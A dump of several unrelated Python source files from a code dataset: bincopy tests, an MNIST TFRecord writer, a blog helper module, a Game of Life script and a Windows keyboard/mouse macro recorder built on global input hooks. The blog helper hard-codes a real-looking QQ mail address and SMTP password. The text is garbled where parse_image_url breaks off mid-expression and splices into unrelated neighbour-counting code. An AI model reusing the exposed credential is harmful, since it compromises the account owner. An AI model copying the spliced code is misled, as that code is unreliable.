binfile.add_ihex(fin.read())\n with open('tests/files/in.i') as fin:\n self.assertEqual(binfile.as_array() + '\\n', fin.read())\n\n def test_hexdump(self):\n binfile = bincopy.BinFile()\n binfile.add_binary(b'12',address=17)\n binfile.add_binary(b'34', address=26)\n binfile.add_binary(b'5678', address=30)\n binfile.add_binary(b'9', address=47)\n with open('tests/files/hexdump.txt') as fin:\n self.assertEqual(binfile.as_hexdump(), fin.read())\n\n binfile = bincopy.BinFile()\n binfile.add_binary(b'34', address=0x150)\n binfile.add_binary(b'3', address=0x163)\n binfile.add_binary(b'\\x01', address=0x260)\n binfile.add_binary(b'3', address=0x263)\n with open('tests/files/hexdump2.txt') as fin:\n self.assertEqual(binfile.as_hexdump(), fin.read())\n\n def test_srec_ihex_binary(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.hex', 'r') as fin:\n binfile.add_ihex(fin.read())\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n with open('tests/files/binary1.bin', 'rb') as fin:\n binfile.add_binary(fin.read(), 1024)\n with open('tests/files/out.hex', 'r') as fin:\n self.assertEqual(binfile.as_ihex(), fin.read())\n with open('tests/files/out.s19') as fin:\n self.assertEqual(binfile.as_srec(address_length_bits=16), fin.read())\n binfile.fill(b'\\x00')\n with open('tests/files/out.bin', 'rb') as fin:\n self.assertEqual(binfile.as_binary(), fin.read())\n\n def test_exclude_crop(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n binfile.exclude(2, 4)\n with open('tests/files/in_exclude_2_4.s19') as fin:\n self.assertEqual(binfile.as_srec(32, 16), fin.read())\n\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n binfile.exclude(3, 1024)\n with open('tests/files/in_exclude_3_1024.s19') as fin:\n self.assertEqual(binfile.as_srec(32, 16), fin.read())\n\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n binfile.exclude(0, 9)\n with open('tests/files/in_exclude_0_9.s19') as fin:\n self.assertEqual(binfile.as_srec(32, 16), fin.read())\n\n binfile = bincopy.BinFile()\n with open('tests/files/empty_main.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n binfile.exclude(0x400240, 0x400600)\n with open('tests/files/empty_main_mod.bin', 'rb') as fin:\n self.assertEqual(binfile.as_binary(padding=b'\\x00'), fin.read())\n\n binfile = bincopy.BinFile()\n binfile.add_srec_file('tests/files/in.s19')\n binfile.crop(2, 4)\n with open('tests/files/in_crop_2_4.s19') as fin:\n self.assertEqual(binfile.as_srec(32, 16), fin.read())\n binfile.exclude(2, 4)\n self.assertEqual(binfile.as_binary(), b'')\n\n def test_minimum_maximum(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n self.assertEqual(binfile.get_minimum_address(), 0)\n self.assertEqual(binfile.get_maximum_address(), 70)\n\n def test_iter_segments(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n i = 0\n for begin, end, data in binfile.iter_segments():\n del begin, end, data\n i += 1\n self.assertEqual(i, 1)\n\n def test_add_files(self):\n binfile = bincopy.BinFile()\n binfile_1_2 = bincopy.BinFile()\n binfile.add_binary(b'\\x00')\n binfile_1_2.add_binary(b'\\x01', address=1)\n binfile += binfile_1_2\n self.assertEqual(binfile.as_binary(), b'\\x00\\x01')\n\n def test_info(self):\n binfile = bincopy.BinFile()\n 
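        # exclude a window inside empty_main and compare against the pre-built reference binary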
with open('tests/files/empty_main.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n self.assertEqual(binfile.info(), \"\"\"header: \"bincopy/empty_main.s19\"\nexecution start address: 0x00400400\ndata:\n 0x00400238 - 0x004002b4\n 0x004002b8 - 0x0040033e\n 0x00400340 - 0x004003c2\n 0x004003d0 - 0x00400572\n 0x00400574 - 0x0040057d\n 0x00400580 - 0x004006ac\n 0x00600e10 - 0x00601038\n\"\"\")\n\n def test_ihex_crc(self):\n self.assertEqual(bincopy.crc_ihex('0300300002337a'), 0x1e)\n self.assertEqual(bincopy.crc_ihex('00000000'), 0)\n\n def test_word_size(self):\n binfile = bincopy.BinFile(word_size_bits=16)\n with open('tests/files/in_16bits_word.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n with open('tests/files/out_16bits_word.s19') as fin:\n self.assertEqual(binfile.as_srec(30, 24), fin.read())\n\n def test_print(self):\n binfile = bincopy.BinFile()\n with open('tests/files/in.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n print(binfile)\n\n def test_issue_4_1(self):\n binfile = bincopy.BinFile()\n with open('tests/files/issue_4_in.hex', 'r') as fin:\n binfile.add_ihex(fin.read())\n with open('tests/files/issue_4_out.hex', 'r') as fin:\n self.assertEqual(binfile.as_ihex(), fin.read())\n\n def test_issue_4_2(self):\n binfile = bincopy.BinFile()\n with open('tests/files/empty_main.s19', 'r') as fin:\n binfile.add_srec(fin.read())\n with open('tests/files/empty_main.hex', 'r') as fin:\n self.assertEqual(binfile.as_ihex(), fin.read())\n\n def test_performance(self):\n binfile = bincopy.BinFile()\n\n # Add a 1MB consecutive binary.\n chunk = 1024 * b\"1\"\n for i in range(1024):\n binfile.add_binary(chunk, 1024 * i)\n\n self.assertEqual(binfile.get_minimum_address(), 0)\n self.assertEqual(binfile.get_maximum_address(), 1024 * 1024)\n\n ihex = binfile.as_ihex()\n srec = binfile.as_srec()\n\n binfile = bincopy.BinFile()\n binfile.add_ihex(ihex)\n\n binfile = bincopy.BinFile()\n binfile.add_srec(srec)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_bincopy.py","file_name":"test_bincopy.py","file_ext":"py","file_size_in_byte":9165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"351268840","text":"# Copyright 2018 The CapsLayer Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==========================================================================\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy as np\nimport tensorflow as tf\n\nfrom capslayer.data.utils.TFRecordHelper import int64_feature, bytes_feature\n\n\nMNIST_FILES = {\n 'train': ('train-images-idx3-ubyte', 'train-labels-idx1-ubyte'),\n 'eval': ('train-images-idx3-ubyte', 'train-labels-idx1-ubyte'),\n 'test': ('t10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte')\n}\n\n\ndef load_mnist(path, split):\n split = split.lower()\n image_file, label_file = [os.path.join(path, file_name) for file_name in MNIST_FILES[split]]\n\n with open(image_file) as fd:\n images = np.fromfile(file=fd, dtype=np.uint8)\n images = images[16:].reshape(-1, 784).astype(np.float32)\n if split == \"train\":\n images = images[:55000]\n elif split == \"eval\":\n images = images[55000:]\n with open(label_file) as fd:\n labels = np.fromfile(file=fd, dtype=np.uint8)\n labels = labels[8:].astype(np.int32)\n if split == \"train\":\n labels = labels[:55000]\n elif split == \"eval\":\n labels = labels[55000:]\n return(zip(images, labels))\n\n\ndef encode_and_write(dataset, filename):\n with tf.python_io.TFRecordWriter(filename) as writer:\n for image, label in dataset:\n image_raw = image.tostring()\n example = tf.train.Example(features=tf.train.Features(\n feature={'image': bytes_feature(image_raw),\n 'label': int64_feature(label),\n 'height': int64_feature(28),\n 'width': int64_feature(28),\n 'depth': int64_feature(1)}))\n writer.write(example.SerializeToString())\n\n\ndef tfrecord_runner(path, force=True):\n train_set = load_mnist(path, 'train')\n eval_set = load_mnist(path, 'eval')\n test_set = load_mnist(path, 'test')\n\n train_set_outpath = os.path.join(path, \"train_mnist.tfrecord\")\n eval_set_outpath = os.path.join(path, \"eval_mnist.tfrecord\")\n test_set_outpath = os.path.join(path, \"test_mnist.tfrecord\")\n\n if not os.path.exists(train_set_outpath) or force:\n encode_and_write(train_set, train_set_outpath)\n if not os.path.exists(eval_set_outpath) or force:\n encode_and_write(eval_set, eval_set_outpath)\n if not os.path.exists(test_set_outpath) or force:\n encode_and_write(test_set, test_set_outpath)\n\n\nif __name__ == '__main__':\n path = \"models/data/mnist\"\n tfrecord_runner(path)\n","sub_path":"capslayer/data/datasets/mnist/writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"586366000","text":"import random, string, time\nfrom datetime import datetime\nfrom io import BytesIO\nfrom PIL import Image, ImageFont, ImageDraw\n\nclass ImageCode:\n def rand_color(self):\n red = random.randint(32, 200)\n green = random.randint(22, 255)\n blue = random.randint(0, 200)\n return red, green, blue\n\n def gen_text(self):\n list = 
random.sample(string.ascii_letters+string.digits, 4)\n        return ''.join(list)\n\n    def draw_lines(self, draw, num, width, height):\n        for _ in range(num):  # use _ so the loop does not shadow the num parameter\n            # random.randint requires int bounds, so floor-divide\n            x1 = random.randint(0, width // 2)\n            y1 = random.randint(0, height // 2)\n            x2 = random.randint(0, width)\n            y2 = random.randint(height // 2, height)\n            draw.line(((x1, y1), (x2, y2)), fill='black', width=2)\n\n    def draw_verify_code(self):\n        code = self.gen_text()\n        width, height = 120, 50\n        im = Image.new('RGB', (width, height), 'white')\n        font = ImageFont.truetype(font='arial.ttf', size=40)\n        draw = ImageDraw.Draw(im)\n        for i in range(4):\n            draw.text((5 + random.randint(-3, 3) + 23 * i, 5 + random.randint(-3, 3)),\n                      text=code[i], fill=self.rand_color(), font=font)\n        self.draw_lines(draw, 4, width, height)\n        return im, code\n\n    def get_code(self):\n        image, code = self.draw_verify_code()\n        buf = BytesIO()\n        image.save(buf, 'jpeg')\n        bstring = buf.getvalue()\n        return code, bstring\n\nfrom smtplib import SMTP_SSL\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\ndef send_email(receiver, ecode):\n    sender = 'Blog <15903523@qq.com>'\n    content = f\"
Welcome to register blog system account, your email verification code is:\" \\\n f\"{ecode},\" \\\n f\"Please copy to the registration window to complete the registration. Thank you for joining our wewrite community.
\"\n message = MIMEText(content, 'html', 'utf-8')\n message['Subject'] = Header('Wewrite registration verification code', 'utf-8')\n message['From'] = sender\n message['To'] = receiver\n\n smtpObj = SMTP_SSL('smtp.qq.com')\n smtpObj.login(user='15903523@qq.com', password='uczmmmqvpxwjbjaf')\n smtpObj.sendmail(sender, receiver, str(message))\n smtpObj.quit()\n\ndef gen_email_code():\n str = random.sample(string.ascii_letters + string.digits, 6)\n return ''.join(str)\n\ndef model_list(result):\n list = []\n for row in result:\n dict = {}\n for k, v in row.__dict__.items():\n if not k.startswith('_sa_instance_state'):\n if isinstance(v, datetime):\n v = v.strftime('%Y-%m-%d %H:%M:%S')\n dict[k] = v\n list.append(dict)\n\n return list\n\ndef model_join_list(result):\n list = [] \n for obj1, obj2 in result:\n dict = {}\n for k1, v1 in obj1.__dict__.items():\n if not k1.startswith('_sa_instance_state'):\n if not k1 in dict: \n dict[k1] = v1\n for k2, v2 in obj2.__dict__.items():\n if not k2.startswith('_sa_instance_state'):\n if not k2 in dict: \n dict[k2] = v2\n list.append(dict)\n return list\n\ndef compress_image(source, dest, width):\n from PIL import Image\n im = Image.open(source)\n x, y = im.size \n if x > width:\n ys = int(y * width / x)\n xs = width\n temp = im.resize((xs, ys), Image.ANTIALIAS)\n temp.save(dest, quality=80)\n else:\n im.save(dest, quality=80)\n\ndef parse_image_url(content):\n import re\n temp_list = re.findall('= 0):\r\n if(matrix[i-1][j]):\r\n alive+=1\r\n # North West\r\n if(j-1 >= 0):\r\n if(matrix[i-1][j-1]):\r\n alive+=1\r\n # North East\r\n if(j+1 < len(matrix)):\r\n if(matrix[i-1][j+1]):\r\n alive+=1\r\n # South\r\n if(i+1 < len(matrix)):\r\n if(matrix[i+1][j]):\r\n alive+=1\r\n # South West\r\n if(j-1 >= 0):\r\n if(matrix[i+1][j-1]):\r\n alive+=1\r\n # South East\r\n if(j+1 < len(matrix)):\r\n if(matrix[i+1][j+1]):\r\n alive+=1\r\n # East\r\n if(j+1 < len(matrix)):\r\n if(matrix[i][j+1]):\r\n alive+=1\r\n # West\r\n if(j-1 >= 0):\r\n if(matrix[i][j-1]):\r\n alive+=1\r\n\r\n return alive\r\n \r\n# Helper function, checks if current live cell should stay alive or die\r\n# n - number of alive neighbors, tmp - tmp_matrix\r\ndef live_cell(n, tmp, i, j):\r\n if(n <= 1 or n >= 4):\r\n # live cell dies\r\n tmp[i][j] = 0\r\n\r\n# Helper function , checks if current dead cell should stay dead or come alive\r\n# n - number of alive neighbors, tmp - tmp_matrix\r\ndef dead_cell(n, tmp, i, j):\r\n if(n == 3):\r\n # dead cell lives\r\n tmp[i][j] = 1\r\n\r\n# Generates 2D matrix\r\ndef gen_matrix(n): \r\n matrix = [[np.random.randint(2) for i in range(n)] for j in range(n)]\r\n return matrix\r\n\r\n# Prints the matrix row by row\r\ndef print_matrix(matrix):\r\n for row in matrix:\r\n print(row)\r\n\r\n# Main method\r\ndef main():\r\n n, l = int(sys.argv[1]), int(sys.argv[2])\r\n matrix = gen_matrix(n)\r\n print(\"Initial Neighbors...\")\r\n print_matrix(matrix)\r\n print('\\n')\r\n\r\n # The magic happens here\r\n generate(matrix, l)\r\n\r\nmain()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"359634165","text":"# Boa:Frame:Frame1\n\nimport os\nimport sys\nimport time\nimport threading\nimport datetime\nimport json\nimport traceback\nimport io\n\nimport wx\nfrom wx.adv import TaskBarIcon as wxTaskBarIcon\nfrom wx.adv import EVT_TASKBAR_LEFT_DCLICK\n\nimport pyWinhook\nimport win32con\nimport win32api\nimport ctypes\nimport 
pyperclip\n\nVERSION = '1.0.0'\n\nwx.NO_3D = 0\nHOT_KEYS = ['F3', 'F4', 'F5', 'F6', 'F7', 'F8', 'F9', 'F10', 'F11', 'F12']\n\n\ndef GetMondrianStream():\n data = b'\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00 \\x00\\x00\\x00 \\x08\\x06\\x00\\x00\\x00szz\\xf4\\x00\\x00\\x00\\x04sBIT\\x08\\x08\\x08\\x08|\\x08d\\x88\\x00\\x00\\x00qIDATX\\x85\\xed\\xd6;\\n\\x800\\x10E\\xd1{\\xc5\\x8d\\xb9r\\x97\\x16\\x0b\\xad$\\x8a\\x82:\\x16o\\xda\\x84pB2\\x1f\\x81Fa\\x8c\\x9c\\x08\\x04Z{\\xcf\\xa72\\xbcv\\xfa\\xc5\\x08 \\x80r\\x80\\xfc\\xa2\\x0e\\x1c\\xe4\\xba\\xfaX\\x1d\\xd0\\xde]S\\x07\\x02\\xd8>\\xe1wa-`\\x9fQ\\xe9\\x86\\x01\\x04\\x10\\x00\\\\(Dk\\x1b-\\x04\\xdc\\x1d\\x07\\x14\\x98;\\x0bS\\x7f\\x7f\\xf9\\x13\\x04\\x10@\\xf9X\\xbe\\x00\\xc9 \\x14K\\xc1<={\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82'\n stream = io.BytesIO(data)\n return stream\n\n\ndef GetMondrianBitmap():\n stream = GetMondrianStream()\n image = wx.Image(stream)\n return wx.Bitmap(image)\n\n\ndef GetMondrianIcon():\n icon = wx.Icon()\n icon.CopyFromBitmap(GetMondrianBitmap())\n return icon\n\n\ndef create(parent):\n return Frame1(parent)\n\n\ndef current_ts():\n return int(time.time() * 1000)\n\n\n[wxID_FRAME1, wxID_FRAME1BTRECORD, wxID_FRAME1BTRUN, wxID_FRAME1BTPAUSE, wxID_FRAME1BUTTON1,\n wxID_FRAME1CHOICE_SCRIPT, wxID_FRAME1CHOICE_START, wxID_FRAME1CHOICE_STOP,\n wxID_FRAME1PANEL1, wxID_FRAME1STATICTEXT1, wxID_FRAME1STATICTEXT2,\n wxID_FRAME1STATICTEXT3, wxID_FRAME1STATICTEXT4, wxID_FRAME1STIMES,\n wxID_FRAME1TEXTCTRL1, wxID_FRAME1TEXTCTRL2, wxID_FRAME1TNUMRD,\n wxID_FRAME1TSTOP, wxID_FRAME1STATICTEXT5, wxID_FRAME1TEXTCTRL3,\n ] = [wx.NewId() for _init_ctrls in range(20)]\n\n\nclass Frame1(wx.Frame):\n def _init_ctrls(self, prnt):\n # generated method, don't edit\n wx.Frame.__init__(self, id=wxID_FRAME1, name='', parent=prnt,\n pos=wx.Point(506, 283), size=wx.Size(366, 201),\n style=wx.STAY_ON_TOP | wx.DEFAULT_FRAME_STYLE,\n title='键盘侠 v%s' % VERSION)\n self.SetClientSize(wx.Size(350, 205))\n\n self.panel1 = wx.Panel(id=wxID_FRAME1PANEL1, name='panel1', parent=self,\n pos=wx.Point(0, 0), size=wx.Size(350, 205),\n style=wx.NO_3D | wx.CAPTION)\n\n self.tnumrd = wx.StaticText(id=wxID_FRAME1TNUMRD, label='ready..',\n name='tnumrd', parent=self.panel1, pos=wx.Point(17, 175),\n size=wx.Size(100, 36), style=0)\n\n self.tstop = wx.StaticText(id=wxID_FRAME1TSTOP,\n label='If you want to stop it, Press F12', name='tstop',\n parent=self.panel1, pos=wx.Point(25, 332), size=wx.Size(183, 18),\n style=0)\n self.tstop.Show(False)\n\n self.stimes = wx.SpinCtrl(id=wxID_FRAME1STIMES, initial=0, max=1000,\n min=0, name='stimes', parent=self.panel1, pos=wx.Point(155, 137),\n size=wx.Size(60, 25), style=wx.SP_ARROW_KEYS)\n self.stimes.SetValue(1)\n\n self.label_run_times = wx.StaticText(id=wxID_FRAME1STATICTEXT2,\n label='执行次数(0为无限循环)',\n name='label_run_times', parent=self.panel1, pos=wx.Point(16, 141),\n size=wx.Size(136, 26), style=0)\n\n self.label_script = wx.StaticText(id=wxID_FRAME1STATICTEXT3,\n label='脚本', name='label_script', parent=self.panel1,\n pos=wx.Point(17, 20), size=wx.Size(40, 32), style=0)\n\n self.choice_script = wx.Choice(choices=[], id=wxID_FRAME1CHOICE_SCRIPT,\n name='choice_script', parent=self.panel1, pos=wx.Point(79, 15),\n size=wx.Size(108, 25), style=0)\n\n self.label_start_key = wx.StaticText(id=wxID_FRAME1STATICTEXT1,\n label='启动键', name='label_start_key',\n parent=self.panel1, pos=wx.Point(16, 63), size=wx.Size(56, 24),\n style=0)\n\n self.label_stop_key = wx.StaticText(id=wxID_FRAME1STATICTEXT4,\n label='终止键', 
name='label_stop_key',\n parent=self.panel1, pos=wx.Point(16, 102), size=wx.Size(56, 32),\n style=0)\n\n self.choice_start = wx.Choice(choices=[], id=wxID_FRAME1CHOICE_START,\n name='choice_start', parent=self.panel1, pos=wx.Point(79, 58),\n size=wx.Size(108, 25), style=0)\n self.choice_start.SetLabel('')\n self.choice_start.SetLabelText('')\n self.choice_start.Bind(wx.EVT_CHOICE, self.OnChoice_startChoice,\n id=wxID_FRAME1CHOICE_START)\n\n self.choice_stop = wx.Choice(choices=[], id=wxID_FRAME1CHOICE_STOP,\n name='choice_stop', parent=self.panel1, pos=wx.Point(79, 98),\n size=wx.Size(108, 25), style=0)\n self.choice_stop.Bind(wx.EVT_CHOICE, self.OnChoice_stopChoice,\n id=wxID_FRAME1CHOICE_STOP)\n\n def __init__(self, parent, *args, **kw):\n\n super().__init__(*args, **kw)\n self._init_ctrls(parent)\n\n self.SetIcon(GetMondrianIcon())\n self.taskBarIcon = TaskBarIcon(self)\n self.Bind(wx.EVT_CLOSE, self.OnClose)\n self.Bind(wx.EVT_ICONIZE, self.OnIconfiy)\n\n if not os.path.exists('scripts'):\n os.mkdir('scripts')\n self.scripts = os.listdir('scripts')[::-1]\n\n self.scripts = list(filter(lambda s: s.endswith('.txt'), self.scripts))\n self.choice_script.SetItems(self.scripts)\n if self.scripts:\n self.choice_script.SetSelection(0)\n\n self.choice_start.SetItems(HOT_KEYS)\n self.choice_start.SetSelection(3)\n\n self.choice_stop.SetItems(HOT_KEYS)\n self.choice_stop.SetSelection(6)\n\n self.running = False\n self.recording = False\n self.record = []\n self.ttt = current_ts()\n\n # for pause-resume feature\n self.paused = False\n self.pause_event = threading.Event()\n\n self.hm = pyWinhook.HookManager()\n\n def on_mouse_event(event):\n\n # print('MessageName:',event.MessageName) #事件名称\n # print('Message:',event.Message) #windows消息常量 \n # print('Time:',event.Time) #事件发生的时间戳 \n # print('Window:',event.Window) #窗口句柄 \n # print('WindowName:',event.WindowName) #窗口标题\n # print('Position:',event.Position) #事件发生时相对于整个屏幕的坐标\n # print('Wheel:',event.Wheel) #鼠标滚轮\n # print('Injected:',event.Injected) #判断这个事件是否由程序方式生成,而不是正常的人为触发。\n # print('---')\n\n if not self.recording or self.running:\n return True\n\n message = event.MessageName\n all_messages = ('mouse left down', 'mouse left up', 'mouse right down', 'mouse right up', 'mouse move')\n if message not in all_messages:\n return True\n\n pos = win32api.GetCursorPos()\n\n delay = current_ts() - self.ttt\n\n # # 录制鼠标轨迹的精度,数值越小越精准,但同时可能产生大量的冗余\n # mouse_move_interval_ms = self.mouse_move_interval_ms.Value or 999999\n #\n # if message == 'mouse move' and delay < mouse_move_interval_ms:\n # return True\n #\n # self.ttt = current_ts()\n # if not self.record:\n # delay = 0\n #\n # print(delay, message, pos)\n\n self.record.append([delay, 'EM', message, pos])\n text = self.tnumrd.GetLabel()\n action_count = text.replace(' actions recorded', '')\n text = '%d actions recorded' % (int(action_count) + 1)\n self.tnumrd.SetLabel(text)\n return True\n\n def on_keyboard_event(event):\n\n # print('MessageName:',event.MessageName) #同上,共同属性不再赘述\n # print('Message:',event.Message)\n # print('Time:',event.Time)\n # print('Window:',event.Window)\n # print('WindowName:',event.WindowName)\n # print('Ascii:', event.Ascii, chr(event.Ascii)) #按键的ASCII码\n # print('Key:', event.Key) #按键的名称\n # print('KeyID:', event.KeyID) #按键的虚拟键值\n # print('ScanCode:', event.ScanCode) #按键扫描码\n # print('Extended:', event.Extended) #判断是否为增强键盘的扩展键\n # print('Injected:', event.Injected)\n # print('Alt', event.Alt) #是某同时按下Alt\n # print('Transition', event.Transition) #判断转换状态\n # print('---')\n\n 
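            # normalise "key sys down/up" (Alt-modified) events to plain key events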
message = event.MessageName\n message = message.replace(' sys ', ' ')\n\n if message == 'key up' and not self.recording:\n # listen for start/stop script\n key_name = event.Key.lower()\n start_name = 'f6' # as default\n stop_name = 'f9' # as default\n\n start_index = self.choice_start.GetSelection()\n stop_index = self.choice_stop.GetSelection()\n start_name = HOT_KEYS[start_index].lower()\n stop_name = HOT_KEYS[stop_index].lower()\n\n if key_name == start_name and not self.running:\n print('script start')\n t = RunScriptClass(self, self.pause_event)\n t.start()\n print(key_name, 'host start')\n elif key_name == stop_name and self.running:\n print('script stop')\n self.tnumrd.SetLabel('broken')\n print(key_name, 'host stop')\n\n if not self.recording or self.running:\n return True\n\n all_messages = ('key down', 'key up')\n if message not in all_messages:\n return True\n\n key_info = (event.KeyID, event.Key, event.Extended)\n\n delay = current_ts() - self.ttt\n self.ttt = current_ts()\n if not self.record:\n delay = 0\n\n print(delay, message, key_info)\n\n self.record.append([delay, 'EK', message, key_info])\n text = self.tnumrd.GetLabel()\n action_count = text.replace(' actions recorded', '')\n text = '%d actions recorded' % (int(action_count) + 1)\n self.tnumrd.SetLabel(text)\n return True\n\n self.hm.MouseAll = on_mouse_event\n self.hm.KeyAll = on_keyboard_event\n self.hm.HookMouse()\n self.hm.HookKeyboard()\n\n def get_script_path(self):\n i = self.choice_script.GetSelection()\n if i < 0:\n return ''\n script = self.scripts[i]\n path = os.path.join(os.getcwd(), 'scripts', script)\n print(path)\n return path\n\n def new_script_path(self):\n now = datetime.datetime.now()\n script = '%s.txt' % now.strftime('%m%d_%H%M')\n if script in self.scripts:\n script = '%s.txt' % now.strftime('%m%d_%H%M%S')\n self.scripts.insert(0, script)\n self.choice_script.SetItems(self.scripts)\n self.choice_script.SetSelection(0)\n return self.get_script_path()\n\n def OnHide(self, event):\n self.Hide()\n event.Skip()\n\n def OnIconfiy(self, event):\n self.Hide()\n event.Skip()\n\n def OnClose(self, event):\n self.taskBarIcon.Destroy()\n self.Destroy()\n event.Skip()\n\n def OnButton1Button(self, event):\n event.Skip()\n\n def OnBtrecordButton(self, event):\n\n if self.recording:\n print('record stop')\n self.recording = False\n self.record = self.record[:-2]\n output = json.dumps(self.record, indent=1)\n output = output.replace('\\r\\n', '\\n').replace('\\r', '\\n')\n output = output.replace('\\n ', '').replace('\\n ', '')\n output = output.replace('\\n ]', ']')\n open(self.new_script_path(), 'w').write(output)\n self.btrecord.SetLabel('录制')\n self.tnumrd.SetLabel('finished')\n self.record = []\n else:\n print('record start')\n self.recording = True\n self.ttt = current_ts()\n status = self.tnumrd.GetLabel()\n if 'running' in status or 'recorded' in status:\n return\n self.btrecord.SetLabel('结束') # 结束\n self.tnumrd.SetLabel('0 actions recorded')\n self.choice_script.SetSelection(-1)\n self.record = []\n\n event.Skip()\n\n def OnBtrunButton(self, event):\n print('script start by btn')\n t = RunScriptClass(self, self.pause_event)\n t.start()\n event.Skip()\n\n def OnBtpauseButton(self, event):\n print('script pause button pressed')\n if self.paused:\n print('script is resumed')\n self.pause_event.set()\n self.paused = False\n self.btpause.SetLabel('暂停')\n else:\n print('script is paused')\n self.pause_event.clear()\n self.paused = True\n self.btpause.SetLabel('继续')\n event.Skip()\n\n def 
OnChoice_startChoice(self, event):\n event.Skip()\n\n def OnChoice_stopChoice(self, event):\n event.Skip()\n\n\nclass RunScriptClass(threading.Thread):\n\n def __init__(self, frame: Frame1, event: threading.Event):\n self.frame = frame\n self.event = event\n self.event.set()\n super(RunScriptClass, self).__init__()\n\n def run(self):\n\n status = self.frame.tnumrd.GetLabel()\n if self.frame.running or self.frame.recording:\n return\n\n if 'running' in status or 'recorded' in status:\n return\n\n script_path = self.frame.get_script_path()\n if not script_path:\n self.frame.tnumrd.SetLabel('script not found, please self.record first!')\n return\n\n self.frame.running = True\n\n try:\n self.run_times = self.frame.stimes.Value\n self.running_text = '%s running..' % script_path.split('/')[-1].split('\\\\')[-1]\n self.frame.tnumrd.SetLabel(self.running_text)\n self.frame.tstop.Shown = True\n\n self.j = 0\n while self.j < self.run_times or self.run_times == 0:\n self.j += 1\n current_status = self.frame.tnumrd.GetLabel()\n if current_status in ['broken', 'finished']:\n self.frame.running = False\n break\n RunScriptClass.run_script_once(script_path, thd=self)\n\n self.frame.tnumrd.SetLabel('finished')\n self.frame.tstop.Shown = False\n self.frame.running = False\n print('script run finish!')\n\n except Exception as e:\n print('run error', e)\n traceback.print_exc()\n self.frame.tnumrd.SetLabel('failed')\n self.frame.tstop.Shown = False\n self.frame.running = False\n\n @classmethod\n def run_script_once(cls, script_path, thd=None):\n\n content = ''\n\n lines = []\n\n try:\n lines = open(script_path, 'r', encoding='utf8').readlines()\n except Exception as e:\n print(e)\n try:\n lines = open(script_path, 'r', encoding='gbk').readlines()\n except Exception as e:\n print(e)\n\n for line in lines:\n # 去注释\n if '//' in line:\n index = line.find('//')\n line = line[:index]\n # 去空字符\n line = line.strip()\n content += line\n\n # 去最后一个元素的逗号(如有)\n content = content.replace('],\\n]', ']\\n]').replace('],]', ']]')\n\n print(content)\n s = json.loads(content)\n steps = len(s)\n\n sw = win32api.GetSystemMetrics(win32con.SM_CXSCREEN)\n sh = win32api.GetSystemMetrics(win32con.SM_CYSCREEN)\n\n for i in range(steps):\n\n print(s[i])\n\n delay = s[i][0]\n event_type = s[i][1].upper()\n message = s[i][2].lower()\n action = s[i][3]\n\n time.sleep(delay / 1000.0)\n\n if thd:\n current_status = thd.frame.tnumrd.GetLabel()\n if current_status in ['broken', 'finished']:\n break\n thd.event.wait()\n text = '%s [%d/%d %d/%d]' % (thd.running_text, i + 1, steps, thd.j, thd.run_times)\n thd.frame.tnumrd.SetLabel(text)\n\n if event_type == 'EM':\n x, y = action\n\n if action == [-1, -1]:\n # 约定 [-1, -1] 表示鼠标保持原位置不动\n pass\n else:\n # 挪动鼠标 普通做法\n # ctypes.windll.user32.SetCursorPos(x, y)\n # or\n # win32api.SetCursorPos([x, y])\n\n # 更好的兼容 win10 屏幕缩放问题\n nx = int(x * 65535 / sw)\n ny = int(y * 65535 / sh)\n win32api.mouse_event(win32con.MOUSEEVENTF_ABSOLUTE | win32con.MOUSEEVENTF_MOVE, nx, ny, 0, 0)\n\n if message == 'mouse left down':\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)\n elif message == 'mouse left up':\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)\n elif message == 'mouse right down':\n win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0)\n elif message == 'mouse right up':\n win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0)\n elif message == 'mouse move':\n pass\n else:\n print('unknow mouse event:', message)\n\n elif event_type == 'EK':\n key_code, 
